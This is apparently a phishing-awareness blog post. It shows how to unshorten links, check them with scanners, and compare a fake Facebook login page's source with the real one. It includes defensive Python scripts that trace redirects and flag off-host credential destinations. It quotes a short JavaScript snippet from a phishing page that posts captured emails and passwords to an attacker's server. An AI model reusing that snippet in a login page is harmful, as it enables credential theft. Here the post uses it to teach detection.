Phish like a Phisher, Defend like a Guardian, The Concluding Part.
Thank you for joining me here! I hope you enjoyed my previous articles. If you haven’t read them yet, please check out the first and second articles before proceeding to the conclusion.
By the end of this article, you’ll be equipped to strengthen your security posture with the help of skilled allies, family, and community members.
Let’s dive into how to defend like a guardian!
Whenever you receive a message or email that pushes you to act right away, think twice. Phishers lean on a handful of emotional triggers:
- Urgency
- Fear
- Curiosity
- Trust
- Greed
Also check for grammatical errors and for links that look suspicious or lead somewhere unexpected.
How can I find out where a link really goes before clicking it? Short URLs hide the destination, and a shortened link can redirect several times before it lands on the real page.
Let's go to this website to uncover where the short URL redirects.
Paste the link into the URL text box and wait for the result.
If you still have doubts about the information above, don't worry: you'll learn to defend like a guardian, I promise!
Now that we've uncovered the redirect destination, let's visit this website to determine whether the link is malicious.
Copy and paste your redirect link into the URL field.
I’ll explore other security vendors with you.
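The unshortening step above can also be done without a third-party site. The script below is an added example written for this article, not a tool the author used: it sends one HEAD request per hop, records every URL in the redirect chain, stops on loops or over-long chains, and finally checks whether the last hop actually lands on the domain you expected. The sample chain at the bottom is constructed for the demo (no real services are contacted); pass the default `fetch` to resolve a live link.

```python
"""Resolve a shortened URL hop by hop and report where it finally lands."""
import http.client
from urllib.parse import urljoin, urlsplit

MAX_HOPS = 10  # assumption: anything longer is treated as suspicious


def http_head(url, timeout=10):
    """Send a single HEAD request and return (status, Location header or None).

    http.client never follows redirects on its own, so every hop stays visible.
    """
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.netloc, timeout=timeout)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    try:
        conn.request("HEAD", path, headers={"User-Agent": "Mozilla/5.0"})
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def follow_redirects(url, fetch=http_head, max_hops=MAX_HOPS):
    """Return (chain, verdict): every URL visited, and 'resolved', 'loop' or 'too_many_hops'."""
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in (301, 302, 303, 307, 308) or not location:
            return chain, "resolved"
        nxt = urljoin(chain[-1], location)  # Location may be relative to the current hop
        chain.append(nxt)
        if nxt in seen:
            return chain, "loop"
        seen.add(nxt)
    return chain, "too_many_hops"


def final_host_matches(chain, expected_domain):
    """True only if the last hop is expected_domain itself or a subdomain of it."""
    host = urlsplit(chain[-1]).hostname or ""
    return host == expected_domain or host.endswith("." + expected_domain)


# Constructed sample chain standing in for live HEAD responses (not real services).
SAMPLE_RESPONSES = {
    "https://short.example/abc123": (301, "https://redirect.example/r?id=9"),
    "https://redirect.example/r?id=9": (302, "/go/9"),  # relative Location header
    "https://redirect.example/go/9": (302, "https://login-facebook.example.net/login"),
    "https://login-facebook.example.net/login": (200, None),
}


def sample_fetch(url):
    """Offline stand-in for http_head that answers from SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    chain, verdict = follow_redirects("https://short.example/abc123", fetch=sample_fetch)
    for i, hop in enumerate(chain):
        print(f"hop {i}: {hop}")
    print("verdict:", verdict)
    print("lands on facebook.com:", final_host_matches(chain, "facebook.com"))
```

The host check is deliberately strict: `login-facebook.example.net` contains the brand name but is not `facebook.com` or a subdomain of it, which is exactly the kind of lookalike a shortener hides.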
What else do I need to do? This can feel overwhelming, so let's break it down: look at where the suspicious page sends your credentials and compare it with the source code of the real Facebook login page.
Let’s take a look at the webpage.
The first red flags on this website are the URL and the interface. Let's review the source code: right-click and select "View Page Source".
// Snippet from the phishing page: vEmail and vPassword hold the values typed into the fake login form
const body = {
  data,
  email: vEmail,
  password: vPassword,
};
axios
  .post('/contact', body) // sends the captured credentials to the attacker's API
  .then(({ data }) => {
    window.location = data; // then redirects the victim wherever the server says
  })
  .catch((err) => {
    window.location = 'https://www.livebotola.com/'; // on error, redirects to a decoy site
  });
The above code captures your credentials and sends them to https://api.sc0m.com/api/contact, which is likely a phishing server designed to store or misuse your information. Note that the path in the code is only /contact; the host is supplied elsewhere in the page's JavaScript, which is why you must read the whole source and not just the form.
That's concerning. When automated tools don't give you a clear answer, think outside the box and read the page yourself.
Let’s review the source code of the actual website.
How can we tell where this form sends the credentials, and why that is acceptable here?
<form class="_9vtf" data-testid="royal_login_form" action="/login/?privacy_mutation_token=..." method="post" id="u_0_2_Ux">
- The action="/login/?privacy_mutation_token=..." is a relative path, so the form submits to the same origin that served the page. On www.facebook.com that is Facebook's own login endpoint; on the phishing page, the credentials left the page for a different host entirely.
- The method is POST, so the credentials travel in the request body rather than in the URL (a GET would leave them in browser history, proxy logs and server logs). POST by itself encrypts nothing; confidentiality still depends on both the page and the action URL being served over HTTPS.
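The comparison above (a relative form action on the real site versus a script that posts credentials to another host on the fake one) can be turned into a repeatable check. This is an added example written for this article, not the author's own tooling: it parses the saved page source, finds every form with a password field and every `axios.post(...)`/`fetch(...)` target in inline scripts, resolves them to absolute URLs, and lists the ones that leave the page's own host. The `baseURL` handling assumes the attacker's script used an axios instance configured that way, which is one common reason a bare `/contact` ends up at a different host; the two HTML samples are constructed for the demo, not captured from any real site.

```python
"""List where a login page sends credentials and flag destinations off the page's host."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginPageParser(HTMLParser):
    """Collect each <form> (action, method, has a password field?) and inline <script> text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action"),
                               "method": (a.get("method") or "get").lower(),
                               "has_password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["has_password"] = True
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1] += data


# First string argument of axios-style .post(...) or fetch(...), and an axios baseURL if present.
POST_CALL = re.compile(r"""(?:\.post|\bfetch)\(\s*['"]([^'"]+)['"]""")
BASE_URL = re.compile(r"""baseURL\s*:\s*['"]([^'"]+)['"]""")


def combine_base(base, path):
    """Mirror how axios joins baseURL and a relative path (duplicate slashes trimmed)."""
    return base.rstrip("/") + "/" + path.lstrip("/")


def credential_destinations(page_url, html):
    """Return [(kind, absolute_url, method)] for every place the page may send a login."""
    parser = LoginPageParser()
    parser.feed(html)
    found = []
    for form in parser.forms:
        if form["has_password"]:
            # A missing or empty action submits back to the page's own URL.
            found.append(("form", urljoin(page_url, form["action"] or ""), form["method"]))
    for body in parser.scripts:
        bases = BASE_URL.findall(body)
        for target in POST_CALL.findall(body):
            if urlsplit(target).scheme:
                absolute = target
            elif bases:
                absolute = combine_base(bases[0], target)
            else:
                absolute = urljoin(page_url, target)
            found.append(("script", absolute, "post"))
    return found


def offsite(page_url, destinations):
    """Keep only destinations whose host is neither the page's host nor a subdomain of it."""
    page_host = urlsplit(page_url).hostname or ""
    flagged = []
    for kind, url, method in destinations:
        host = urlsplit(url).hostname or ""
        if not (host == page_host or host.endswith("." + page_host)):
            flagged.append((kind, url, method))
    return flagged


# Constructed samples (not captured from any real site).
LEGIT_URL = "https://www.facebook.com/"
LEGIT_HTML = """
<form data-testid="royal_login_form" action="/login/" method="post">
  <input type="text" name="email"><input type="password" name="pass">
</form>
"""

PHISH_URL = "https://phish.example.net/facebook/"
PHISH_HTML = """
<form id="login"><input type="text" id="email"><input type="password" id="pass"></form>
<script>
  const api = window.axios.create({ baseURL: 'https://api.example.org/api' });
  document.getElementById('login').onsubmit = (e) => {
    e.preventDefault();
    const body = { email: vEmail, password: vPassword };
    api.post('/contact', body).then(({ data }) => { window.location = data; });
  };
</script>
"""

if __name__ == "__main__":
    for name, url, html in (("legit", LEGIT_URL, LEGIT_HTML), ("phish", PHISH_URL, PHISH_HTML)):
        dests = credential_destinations(url, html)
        print(name, "destinations:", dests)
        print(name, "off-site:", offsite(url, dests))
```

On the legitimate sample the only destination is `https://www.facebook.com/login/` via POST, same host as the page, so nothing is flagged; on the phishing sample the visible form posts back to itself, but the script's `api.post('/contact', ...)` resolves to `https://api.example.org/api/contact`, a different host, and that is the line to flag.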
I hope you appreciate the way you can defend like a guardian. We tested several security vendors' URL tools, and none of them flagged a phishing link that was actively stealing people's credentials; reading the page source is what exposed it.
If you ever suspect you are looking at a phishing page, add this approach to your existing methods. The URL scanning tools didn't work for us in this case, but that doesn't mean they aren't useful: a clean result from a scanner is not proof that a link is safe.
Key Takeaway:
- Educate Your Team Regularly
- Don’t Trust Unknown Links or Attachments
- Check for Secure URLs (look for HTTPS, but remember that phishing sites use HTTPS too; the padlock proves the connection is encrypted, not that the site is genuine)
- Keep Software and Security Tools Updated
- Hover over links to see where they really go; don't just click.
This is how you can address phishing activities in your organization, home, and community.
One more thing: make this a part of your daily routine.
Cybersecurity is Intention -Abdul Basit Rotimi
Don’t forget it’s your gUy — Abdul Basit Rotimi
Follow me for more cybersecurity content.